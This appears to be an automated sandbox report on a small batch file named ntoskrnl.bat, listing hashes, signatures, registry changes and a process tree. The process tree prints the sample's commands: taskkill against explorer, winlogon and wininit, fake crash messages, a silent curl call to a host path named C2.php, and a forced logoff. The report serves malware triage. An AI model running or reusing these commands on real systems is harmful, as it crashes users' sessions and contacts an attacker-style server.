Analysis
- max time kernel: 30s
- max time network: 14s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 12/09/2024, 15:24
Static task
- static1

Behavioral tasks
- behavioral1: sample ntoskrnl.bat, resource win10-20240404-en, 6 signatures, 30 seconds
- behavioral2: sample ntoskrnl.bat, resource win7-20240708-en, 3 signatures, 30 seconds
- behavioral3: sample ntoskrnl.bat, resource win10v2004-20240802-en, 6 signatures, 30 seconds
- behavioral4: sample ntoskrnl.bat, resource win11-20240802-en, 6 signatures, 30 seconds
General
- Target: ntoskrnl.bat
- Size: 493B
- MD5: 38e1e4c90b2c943e856bbe7c052ad3a2
- SHA1: 07175f8e4095cf1b60d791a1d1a80908d5c2aca0
- SHA256: 774820fb725e4af50219d46467650d3c7eb7e9a766d6069130f49a28f315d680
- SHA512: d7b79247122649c1e62185bd943f4f4c9ae48e700a0a836256027d4fa3fa53ee90cc7aa290aca8ad7280337ec9a928b1f86b4d92edad75ac1ac941de7219b655
- Score: 1/10
Malware Config

Signatures

Kills process with taskkill (3 IoCs)
- PID 5088: taskkill.exe
- PID 4128: taskkill.exe
- PID 5040: taskkill.exe
Modifies data under HKEY_USERS (15 IoCs)
All entries below were made by process LogonUI.exe:
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "182"
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent
- Set value (data): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"
Suspicious behavior: LoadsDriver (64 IoCs)
Suspicious use of AdjustPrivilegeToken (3 IoCs)
- Token: SeDebugPrivilege, PID 5088, taskkill.exe
- Token: SeDebugPrivilege, PID 4128, taskkill.exe
- Token: SeDebugPrivilege, PID 5040, taskkill.exe
Suspicious use of SetWindowsHookEx (1 IoC)
- PID 2692: LogonUI.exe
Suspicious use of WriteProcessMemory (16 IoCs)
Source process in every entry is PID 1328 (cmd.exe); each event is recorded twice in the report:
- PID 1328 wrote to memory of PID 5088 (procid_target 84)
- PID 1328 wrote to memory of PID 2476 (procid_target 86)
- PID 1328 wrote to memory of PID 4128 (procid_target 87)
- PID 1328 wrote to memory of PID 1500 (procid_target 88)
- PID 1328 wrote to memory of PID 1844 (procid_target 89)
- PID 1328 wrote to memory of PID 1020 (procid_target 90)
- PID 1328 wrote to memory of PID 2836 (procid_target 96)
- PID 1328 wrote to memory of PID 5040 (procid_target 98)
Processes
- C:\Windows\system32\cmd.exe (PID 1328)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ntoskrnl.bat"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\taskkill.exe (PID 5088)
    Command line: taskkill /f /im explorer.exe
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\msg.exe (PID 2476)
    Command line: msg * Explorer has been crashed.
  - C:\Windows\system32\taskkill.exe (PID 4128)
    Command line: taskkill /f /im winlogon.exe
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\msg.exe (PID 1500)
    Command line: msg * Windows Account Crashed.
  - C:\Windows\system32\msg.exe (PID 1844)
    Command line: msg * ERROR 404: FAILED TO FETCH RESOURCE FROM SERVER https://heckergd.serv00.net/data/C2.php
  - C:\Windows\system32\curl.exe (PID 1020)
    Command line: curl heckergd.serv00.net/data/C2.php --silent
  - C:\Windows\system32\logoff.exe (PID 2836)
    Command line: logoff
  - C:\Windows\system32\taskkill.exe (PID 5040)
    Command line: taskkill /f /im wininit.exe
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\LogonUI.exe (PID 2692)
  Command line: "LogonUI.exe" /flags:0x4 /state0:0xa39ad055 /state1:0x41c64e6d
  Signatures: Modifies data under HKEY_USERS; Suspicious use of SetWindowsHookEx